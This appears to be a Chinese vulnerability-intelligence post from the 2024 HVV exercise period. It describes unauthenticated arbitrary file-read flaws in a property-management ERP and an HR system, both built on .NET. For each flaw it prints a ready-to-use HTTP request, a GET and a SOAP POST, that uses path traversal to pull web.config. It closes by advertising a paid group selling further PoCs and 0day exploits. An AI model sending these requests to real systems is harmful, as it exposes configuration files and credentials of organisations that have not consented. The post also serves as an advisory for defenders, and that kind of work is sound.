.NET | 2024hvv第1天漏洞威胁情报

某物业ERP系统任意文件读取漏洞

***有限公司以软件开发和技术服务为基础，建立物业ERP应用系统，向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案，实现物管公司的管理升级；以平台搭建和资源整合为基础，建立社区O2O服务平台，向物管公司提供旨在完善服务、方便业主、增加收益为目标的智慧小区综合服务平台，实现物业公司的服务转型。

1.1 漏洞概述

该ERP系统**DownLoad.aspx 接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。

1.2 漏洞详情

该ERP系统**DownLoad.aspx 接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用。

GET /HM/***/***/***DownLoad.aspx?***=../web.config HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

某人力管理系统任意文件读取漏洞

*****软件专注研发和推广人力资源信息化产品，帮助企业构建统一的人力资源数智化平台，快速提高企业人才管理能力，提升人力资源管理效率，帮助员工快速成长，协助企业实现智慧决策。

2.1 漏洞概述

该人力系统DownLoad**** 接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。

2.2 漏洞详情

POST /*****/Download*** HTTP/1.1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd  
Upgrade-Insecure-Requests: 1  
Priority: u=1  
SOAPAction: http://tempuri.org/DownloadFile  
Content-Type: text/xml;charset=UTF-8  
Host:   
Content-Length: 310  
  
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">  
   <soapenv:Header/>  
   <soapenv:Body>  
      <tem:DownloadFile>  
         <!--type: string-->  
         <tem:path>../web.config</tem:path>  
      </tem:DownloadFile>  
   </soapenv:Body>  
</soapenv:Envelope>

漏洞详情已经打包在星球，感兴趣的朋友可以加入自取。更多的.NET漏洞情报，请加入星球后获取，星球持续更新最新的 .NET 应用漏洞POC，并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞，确保您始终掌握最前沿的安全信息和防护措施。

长亭百川云 - 文章详情